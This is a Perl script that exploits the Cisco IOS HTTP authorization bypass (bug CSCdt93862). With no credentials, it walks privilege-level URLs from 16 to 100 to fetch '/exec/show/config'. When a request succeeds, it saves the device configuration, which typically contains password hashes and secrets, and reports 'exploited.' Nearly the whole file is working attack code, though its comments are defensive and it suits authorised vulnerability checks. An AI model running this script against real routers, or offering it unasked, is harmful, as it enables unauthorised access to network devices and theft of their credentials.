#!/usr/bin/perl

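#
# Checks a host for the Cisco IOS HTTP authorization vulnerability
# (Cisco Bug ID CSCdt93862) by brute-forcing the privilege-level URL:
# it requests /level/N/exec/show/config for N = 16..100 without credentials.
# If any request succeeds, the returned body is saved to a file named after
# the host.
#
# Usage: pass the target host name or address as the only argument.
#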

use LWP;
use IO::Handle;

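# The target host (name or address) is the only command-line argument.
# Stop early with a usage line rather than sending a request to "http:///"
# when it is missing or empty.
my $host = shift;
die "usage: $0 <host>\n" unless defined $host && length $host;

# Emit the "<host>: " label immediately so the verdict printed later lands on
# the same line even though STDOUT may be buffered.
print "$host: ";
STDOUT->flush;

my $agent    = LWP::UserAgent->new;
my $request  = HTTP::Request->new(GET => "http://$host/");
my $response = $agent->request($request);
my $level;

# Baseline request to "/" with no credentials. Only a 401 lets the script
# continue to the per-level check; every other status (success included,
# since a successful response is never a 401) ends the run here.
if ($response->code != 401) {
	# Report the Server header when there is one, so the operator can see
	# what answered; otherwise say the host did not behave as expected.
	my $server = $response->header('Server');
	if (defined $server && $server ne '') {
		print $server;
		print "\n";
	}
	else {
		print "unexpected response, may not be a Cisco.\n";
	}
	exit;
}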

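# Request /level/N/exec/show/config for N = 16..100, reusing the same
# unauthenticated request object. The first successful reply ends the run;
# a reply that is neither a success nor a 401 also ends it, as "unexpected".
for my $level (16 .. 100) {
	$request->uri("http://$host/level/$level/exec/show/config");
	$response = $agent->request($request);

	if ($response->is_success) {
		# A success here means the device answered a command URL without
		# credentials, i.e. it is affected by the bug named in the file
		# header. NOTE(review): remediation is on the device side (fixed
		# IOS release, or disabling the HTTP server); confirm the exact
		# steps against Cisco's advisory for that bug ID.

		# The output file is named after the host argument. Never hand
		# that argument to open() unfiltered: the old two-argument form
		# let it carry mode characters or a path. Anything outside a
		# conservative host-name alphabet becomes "_", so the file is
		# always created in the current directory.
		(my $outfile = $host) =~ s{[^A-Za-z0-9._:\[\]-]}{_}g;

		# The body is expected to be the device configuration, which
		# typically contains password hashes and other secrets, so a
		# newly created file is made readable by its owner only.
		my $saved_umask = umask 0077;
		open(my $out, '>', $outfile)
			or die "Can't open file $outfile: $!\n";
		umask $saved_umask;

		print {$out} $response->content
			or die "Can't write file $outfile: $!\n";
		# Buffered write errors surface at close, so check that as well.
		close($out)
			or die "Can't close file $outfile: $!\n";

		print "exploited.\n";
		exit;
	}

	# Anything other than "still unauthorized" means the host is not
	# behaving as the check expects; stop instead of trying more levels.
	if ($response->code != 401) {
		print "unexpected response, may not be a Cisco.\n";
		exit;
	}
}

# Every level returned 401: the device did not show the bypass.
print "failed.\n";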
